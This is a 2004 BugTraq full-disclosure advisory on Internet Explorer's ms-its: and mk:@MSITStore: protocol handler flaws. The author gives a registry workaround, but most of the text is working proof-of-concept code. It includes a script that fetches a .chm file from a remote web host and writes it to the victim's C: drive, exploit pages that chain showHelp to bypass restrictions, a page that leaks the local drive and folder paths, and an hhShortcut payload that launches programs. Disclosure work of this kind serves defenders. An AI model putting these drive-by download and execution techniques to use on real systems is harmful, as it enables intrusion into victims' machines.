BugTraq
IE ms-its: and mk:@MSITStore: vulnerability Mar 28 2004 07:03AM
roozbeh afrasiabi (roozbeh_afrasiabi yahoo com)


advisory#2

/--------------------------------------------------------------------/

Vendor: Microsoft Corp.

product: IE.6(only tested on winXP,other products might

be vulnerable too including IE.5)

Discovery by: Roozbeh Afrasiabi (roozbeh_afrasiabi (at) yahoo (dot) com [email concealed])

Discovery date : NOV,2001 Reported :MAR,2004

Title: IE ms-its: and mk:@MSITStore: vulnerability

MSRC: MSRC5162mr

/--------------------------------------------------------------------/

TABLE OF CONTENTS:

==================

Description..............................................1

Solutions................................................2

PoCs.....................................................3

References...............................................4

Contact info.............................................5

Disclaimer...............................................6

1)Description:

==================

There exists a security issue with the way the ms-its(its) and mk:@MSITStore:protocol handlers become available to internet explorer after *.chm files that are functional outside help and support center are initiated using showhelp() , when this happens internet explorer is capable of accessing thosefiles using ms-its(its) or mk:@MSITStore: protocol handlers , the nature of these files makes this matter dangerous to the users . The pages that becomeavailable to IE using ms-its or mk:@MSITStore: p-handlers are only those thatof the chm file opened using showhelp() however this can be bypassed using the restriction bypass vulnerability previously reported by Arman Nayyeri.

I must point out that the ms-its: and mk:@MSITStore: protocol handlers are also available to IE when no chm file has been opened but to access these filesthe path to the target chm file must be used which is why the restriction Bypass vulnerability is possible.

Combined with other vulnerabilities that can place files on user 's system it is possible to open harmful html pages in victim 's MYcomputer zone,the fact that these two p-handlers can use the path of their target files gives the author the idea that it is also possible to run chm files from a web server in victim's internet zone in the same way by using their internet address.

(ms-its:http:\\www.exploit.com\exploit.chm::\exploit.htm).

Execution of programs is also possible but this can only be true when a chm file that imports shared.js is already open,Shared.js which is part of ntshared.chm is actually the main script used in most windows chm files,this file has a lot of functionality which can be exploited to bypass restrictions.When IE opens these files using the two p-handlers discussed they are not as restricted as a simple html file would be.Execution of programs that are shiped with the os is done using their name but it is also possible to run exe files using their path,

access to some shell folders is also possible.you can automate the execution of a program using object tag too.When programs are executed using object tag on victim's system there is no need for knowing the exact path to the executables whose MUICACHE name is fixed when such program iscalled using an object the MUICACHE is searched to find an exe with the same MUICACHE name or exe name executables like this are initiated without the need of knowing their exact path.

The following represents some of these executables and shell folders:

I)exe/s

conf.exe

notepad.exe

ntbackup.exe

spider.exe

tourstart.exe

explorer.exe

iexplore.exe

RealPlay.exe

wmplayer.exe

xmplayer.exe

hh.exe

regedit.exe

sol.exe

taskmgr.exe

winmine.exe

WScript.exe

appwiz.cpl

access.cpl

hdwwiz.cpl

nusrmgr.cpl

II)folder/s

shell:windows

shell:cookies

shell:recent

shell:system

shell:Common AppData

shell:Common Desktop

shell:Common Documents

shell:Common Favorites

shell:Common Programs

shell:Common Start Menu

shell:Common Startup

shell:Common Templates

shell:Common Administrative Tools

shell:CommonVideo

shell:CommonPictures

shell:Personal

shell:local appdata

shell:profile

shell:Administrative Tools

The fact that IE can access chm files using these two protocol handlers is due to the fact that

this software in windows OS dose not act as a simple browser , IE is capable of interacting and

responding to different protocols some of which like "shell:" , "about:" , "res:" ,.... have

previously been reported vulnerable which makes the author consider the remaining protocols

vulnerable too.

*ntshared.js is also available via iexplore.chm.

*you might want to use (iexplore.chm::/iegetsrt.htm) to have full confidance it exists .

*ms-its:D:\x.chm::\run.htm if run.htm was crafted so that it executes x.exe when it is

called using ms-its help would search d:\ to find x.exe.

*MUICACHE : HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache

*for more info on shell folders take a look at my first advisory:

http://www.freewebs.com/roozbeh_afrasiabi/advisory(1).txt

2)Solutions:

==================

-Best solution

The best solution to this problem is limiting IE 's functionality to that of a simple browser which I doubt Microsoft is able of achieving in near future because most products and even the windows/OS developed by Microsoft cop. is based upon this extra functionality which makes the

situation even worse.

-Solution from author:

1)run regedit.exe

2)find the following key : HKEY_CLASSES_ROOT\PROTOCOLS\Handler

3)select any of the protocol handlers unnecessary

4)disable them by replacing "-" in front of their clsid value

*The author considers most of these protocol handlers vulnerable and it is best if users disablethose protocols they find unsafe.

[Caution]

If you have used Author's solution be aware that running chm files directly from your system after disabling it using regedit would in some cases cause instant restart.

-solution from Microsoft:

Microsoft was notified and they had one week to give me their solution but

they failed to do so. sorry mike could not wait longer.

3)Proof of concept:

===================

*download x.chm from http://www.freewebs.com/roozbeh_afrasiabi/x.chm

for testing this vulnerability.

x.chm content:

dis-info.htm

exe(0).htm:list of some programs and shell folders that can be executed

exe(1).htm:cmd

exe(2).htm:minesweeper

exe(3).htm:notepad

exe(4).htm:wordpad

exe(5).htm:cdm+dir

exe(6).htm:c:\\x.exe

exe(7).htm:Run your desired program as far as either it's path or MUICACHE name is known.

folder(1).htm:windows folder

folder(2).htm:profile folder

folder(3).htm:cookies folder

logoff.htm:on win/xp causes user logoff

vulnerable.htm

a)availability of the two p-handlers using exact path:

=========================

mk:@MSITStore:%windir%\Help\ntshared.chm::/copyright.htm

or mk:@MSITStore:%windir%\Help\ntshared.chm::copyright.htm

%windir% =location of the operating system directory

The following poc uses a vulnerability in wmplayer 8.0 to place

x.chm on victim's system.

<textarea id="code" style="display:none;">

var x = new ActiveXObject("Microsoft.XMLHTTP");

x.Open("GET", "http://www.freewebs.com/roozbeh_afrasiabi/x.chm",0);

x.Send();

var s = new ActiveXObject("ADODB.Stream");

s.Mode = 3;

s.Type = 1;

s.Open();

s.Write(x.responseBody);

s.SaveToFile("C:\\x.chm",2);

location.href = "mms://";

</textarea>

<script language="javascript">

function preparecode(code) {

result = '';

lines = code.split(/\r\n/);

for (i=0;i<lines.length;i++) {

line = lines[i];

line = line.replace(/^\s+/,"");

line = line.replace(/\s+$/,"");

line = line.replace(/'/g,"\\'");

line = line.replace(/[\\]/g,"\\\\");

line = line.replace(/[/]/g,"%2f");

if (line != '') {

result += line +'\\r\\n';

}

}

return result;

}

function doit() {

mycode = preparecode(document.all.code.value);

myURL = "file:javascript:eval('" + mycode + "')";

window.open(myURL,"_media");

setTimeout("x()", 8000);

}

window.open("error.aso","_media");

setTimeout("doit()", 5000);

</script>

<script language=javascript>

function x(){

//hcp://services/subsite?node=_System_/Tools_Center&topic=ms-its:c:\\x.c
hm::\exploit.htm

//showHelp("ms-its:c:\\x.chm::exploit.htm")

//showHelp("ms-its:addremov.chm::..\\..\\c:\\ntshared.chm::\\copyright.h
tm");

window.open("ms-its:c:\\x.chm::\vulnerable.htm","mywindow","location=0,s
tatus=1,scrollbars=1")

mywindow.moveTo(0,0);

}

</script>

*If you want to test this locally change "http://www.freewebs.com/roozbeh_afrasiabi/x.chm"

to file:\\location of chm file.

*for more info about the script that places the file on victim's system visit malware.com

or www.K-OTiK.Com.

The following poc was given by Arman Nayyeri for the restriction bypass vulnerability,

by changing the showhelp function to window.open you can use it as a poc to my report too:

*rename c.chm to x.wsz

<iframe src=xvulnx.wsz></iframe>

<h1>Wait For 8 Seconds...</h1>

<script>

setTimeout(

     function () {

            window.open("mk:@MSITStore:iexplore.chm::..\\..\\..\\..\\pro
gram

files\\winamp\\skins\\x.wsz::\winamp.htm");

//hcp://services/subsite?node=blank&topic=ms-its:c:\program files\winamp\skins\x.chm::\exe(7).htm

     },

  8000

);

</script>

*As seen in the above it is also possible to use hcp://services/subsite?

node=blank&topic=ms-its:c:\x.chm::\exe(7).htm if the victim system is vulnerable to hcp::// .

b)restriction bypass vulnerability

====================================

<html>

<head>

<title>Exploit</title>

<SCRIPT LANGUAGE=javascript>

function getlink(){

target=window.open("ms-its:addremov.chm::..\\..\\ntshared.chm::\\copyrig
ht.htm")

}

</script>

</head>

<body bgcolor="#FFFFFF" text="#000000" LANGUAGE="VBScript">

<b><br>Restriction Bypass Vulnerability + ms-its: p-handler

vulnerability<br></b><br>

<BUTTON TYPE=SUBMIT ID="exploit"> Exploit </BUTTON> 

</body>

<SCRIPT LANGUAGE=VBSCRIPT>

Private SUB exploit_OnClick()

ON ERROR RESUME NEXT

showHelp("addremov.chm::/win_addprog_window_component.htm")

getlink()

END SUB

</SCRIPT>

c)MS-its

==================

(situation: when showhelp() is used to make these p-handlers available)

<html>

<head>

<title>Exploit</title>

<SCRIPT LANGUAGE=javascript>

function getlink(){

target=window.open("ms-its:addremov.chm::/win_addprog_install_program.ht
m")

}

</script>

</head>

<body bgcolor="#FFFFFF" text="#000000" LANGUAGE="VBScript">

<b><br>Internet Explorer MS-ITS protocol handler

vulnerability<br></b><br>

<BUTTON TYPE=SUBMIT ID="exploit"> Exploit </BUTTON> 

</body>

<SCRIPT LANGUAGE=VBSCRIPT>

Private SUB exploit_OnClick()

ON ERROR RESUME NEXT

showHelp("addremov.chm::/win_addprog_window_component.htm")

getlink()

END SUB

</SCRIPT>

d)mk:@MSITStore

==================

(situation: when showhelp() is used to make these p-handlers available)

<html>

<head>

<title>Exploit</title>

<SCRIPT LANGUAGE=javascript>

function getlink(){

target=window.open("mk:@MSITStore:isconcepts.chm::/ismain-concepts_52.ht
m/")

}

</script>

</head>

<body bgcolor="#FFFFFF" text="#000000" LANGUAGE="VBScript">

<b><br>Internet Explorer mk:@MSITStore: protocol handler

vulnerability<br></b><br>

<BUTTON TYPE=SUBMIT ID="exploit"> Exploit </BUTTON> 

</body>

<SCRIPT LANGUAGE=VBSCRIPT>

Private SUB exploit_OnClick()

ON ERROR RESUME NEXT

showHelp("isconcepts.chm::/ismain-concepts_52.htm")

getlink()

END SUB

</SCRIPT>

e)Either of this p-handlers allow use of files the local chm file contains *.js,*.gif,*.htm

*.css,*.xml,

=================================

ms-its:ntshared.chm::\warning.gif

ms-its:ntshared.chm::\shared.js

ms-its:ntshared.chm::\glossary.xml

ms-its:ntshared.chm::\coua.css

<img border="0" src="ms-its:ntdef.chm::/Uabrand.gif">

This can be used to test if help is running on victim's system or not.

<html>

<head>

<SCRIPT LANGUAGE="JScript">

function x(){

showHelp("filefold.chm::/windows_fcab_playall.htm");

location.reload();

}

</script>

</head>

<body>

<img border="0" src="ms-its:ntdef.chm::/Uabrand.gif" onerror=x()>

</body>

</html>

There is also the possibility of importing *.js files like shared.js:

<SCRIPT LANGUAGE="JScript" SRC="MS-ITS:ntshared.chm::/shared.js"></SCRIPT>

f)information disclosure

========================

<<html>

<head>

<title>Exploit</title>

<p><br><b>HTM help file opened in an iframe</b><br><br>

<iframe id="target" width="400" height="200" src="" name="target" scrolling="yes">

</iframe>

<SCRIPT LANGUAGE=javascript>

exec="hello"

function getlink(){

showHelp("filefold.chm::/windows_fcab_playall.htm")

target.location.href="ms-its:filefold.chm::/windows_fcab_playall.htm"

setTimeout("exploit()",4*100)

}

function exploit(){

this.focus();

loc=new String(target.moniker.substring(7,target.moniker.length));

rootdrive=loc.substring(0,3);

winloc=loc.substring(0,loc.indexOf("help"))

x.document.write("<b>root drive :</b> "+rootdrive+"<br>")

x.document.write("<b>windows folder :</b> "+winloc+"<br>")

}

</script>

</head>

<body bgcolor="#FFFFFF" text="#000000" onload=getlink()>

<p><br><b>Information disclosed:</b><br><br>

<iframe id="x" width="400" height="200" name="x" scrolling="no" align="left">

</iframe></p>

g)chm file on a web server

===========================

<html>

<title>Exploit</title>

<head>

</head>

<body bgcolor="#FFFFFF" text="#000000"

onload=javascript:document.location="ms-its:http://www.freewebs.com/rooz
beh_afrasiabi/x.chm::/vulner

able.htm">

</body>

</html>

*How about banner free webpages for those who are vulnerable!!!

h)HCP://

==================

This proves the fact that other programs that use internet explorer might be vulnerable too.

hcp://services/subsite?node=blank&topic=ms-its:isconcepts.chm::/ismain-c
oncepts_62.htm

hcp://services/subsite?node=_System_/Tools_Center&topic=ms-its:c:\\x.chm
::\vulnerable.htm

I)execution of programs

======================

<html>

<title>Exploit</title>

<head>

</head>

<body bgcolor="#FFFFFF" text="#000000"

onload=javascript:document.location="ms-its:c:\\x.chm::exe(n).htm">

</body>

</html>

*"c:\\x.chm::exploitx.htm" can be replaced with http:\\www.exploit.com\x.chm::exploitx.htm

but to acheive this some changes must be made.

Links that execute programs have the following general look:

<A ID="shortcut" HREF="EXEC=@@executable_name.exe@@ CHM=ntshared.chm

FILE=@@error_file_name.htm@@">@@Shortcut text@@</A>

callShortcut a function in shared.js changes links like this into an object :

<object id='hhShortcut' type='application/x-oleobject'

classid='clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11' STYLE='display:none'>

<param name='Command' value='ShortCut'>

<param name='Window' value='error_page'>

<param name='Item1' value='NAME_OF_ExE ,LOCATION_OF_EXE\NAME.EXE'>

<param name='Item2' value='msg,1,1'></object>

This object is then inserted before the end of the htm page using insertAdjacentHTML() function.

The following would do the trick:

var __w=document.write('<object id=hhShortcut type=application/x-oleobject

classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 STYLE=display:none\u003E<param name=Command

value=ShortCut\u003E<param name=Item1

value=,_executable_,,\u003E</object\u003E');hhShortcut.Click();;if(__w!=
null)document.write(__w);

using hcp:// vulnerability to execute programs:

hcp://services/subsite?node=blank&topic=ms-its:c:\x.chm::\exe(2).htm

4)References:

==================

www.malware.com (wmplayer exploit code)

www.K-OTiK.Com

http://secunia.com/advisories/10523/

5)Contact Info

==================

roozbeh_afrasiabi (at) yahoo (dot) com [email concealed]

da_stone_cold_killer (at) yahoo (dot) com [email concealed]

-----BEGIN PGP PUBLIC KEY BLOCK-----

Version: GnuPG v1.2.1 (MingW32) - WinPT 0.7.96rc1

mQGiBEBVbGoRBACT+S7j6awJjH8ctpioGfdmQzfwxd/M5vcafFpWjYTb2g4NINfB

gzbXFANzOMDcXhmrQysvgeFl7smhFVKDl0c7dtsqvgn5pydfXRCljZwrSQAwE/PS

vSSzV7QhEI5zLWkpieyjZhlxCYtHlxma36pBx3ZpPPDfAFNpW0QBB94rxwCgoZO9

TR/YXs19bOipfffI02dv758EAILHfEHXNkb050yaU8y47JJXl64OOnQcwgNafLa4

cEyYSRYwkZUqnBX6xmB/hy8J9AnmED7tjKLSqrupJivrxueSwbNom+QN2cPpWv+i

MZXGgMLZAOrlAi4R7gGBAIq7K+Ow0Z4/FQMH3Aryw9WkBlDK7bChfLeoAXNrQAWG

kfgKA/47WQN0SAD9KSmbdMB6q8EE7sD7vYkZWIg+j4JJaWskdN7qCbSB6EBnWKQb

6gE2999nlphhmcUjS1TgjUgCLHjQ9lMIWr0Zec8NmcZyEVnEKgjHK7MkvocLpT7h

zYkVMO9HLecllYr6FrnNtWpOw/X7FVhSkNIKgNNZQ0Z3Xi3Z57RQcm9vemJlaCBh

ZnJhc2lhYmkgKHJvb3piZWhfYWZyYXNpYWJpQHlhaG9vLmNvbSkgPGRhX3N0b25l

X2NvbGRfa2lsbGVyQHlhaG9vLmNvbT6IWQQTEQIAGQUCQFVsagQLBwMCAxUCAwMW

AgECHgECF4AACgkQLh+KhhfWhDXgTwCeKAVoNkUjYqBbWu+l3WfArf4+vwkAoIjx

rBC/FnLEJDuSJ5SuLho04QtOuOsEQFVscwEHAL5OyxFo1eAwGijoPfIwQPINLuvr

bo7WVzwGmUXvvZsbLvMjc80zdUD2PaZr1kurZwqE13If+XzpNZdlFfmjtYKST+s8

8lwnzK2ososE0m4uT1MatHQxK3HNKIDRUOg7TC8PaPD+FUYntcdUYs3bdror7179

kOIfM7/ZtCQuWoqFMOZiCTd7PUSgmEXsUWoNzlNmGJmZMgSc0MtAFiGDys3sA5fK

8JyOA0rQHvmcne1Xh9P4aA9+mutSGnx/4mFPYLdDFBA5go5B0XOPrjQelxQlRAAU

xmWk0kgx+X25WRK/AAYpiEYEGBECAAYFAkBVbHMACgkQLh+KhhfWhDUH4wCfZ/83

xkEvaT1IWeaDemU5dYAysPsAnRP6Qyw1DM3gHhxl6m+bjEwPX6AG

=q+hK

-----END PGP PUBLIC KEY BLOCK-----

6)Disclaimer

==================

Roozbeh Afrasiabi is not responsible for the misuse of the information provided in this report. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this advisory. Any use ofthe information is at the user's own risk.

Especial thanks to

==================

MSRC

Members of Antionline.com

All Rights Reserved

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus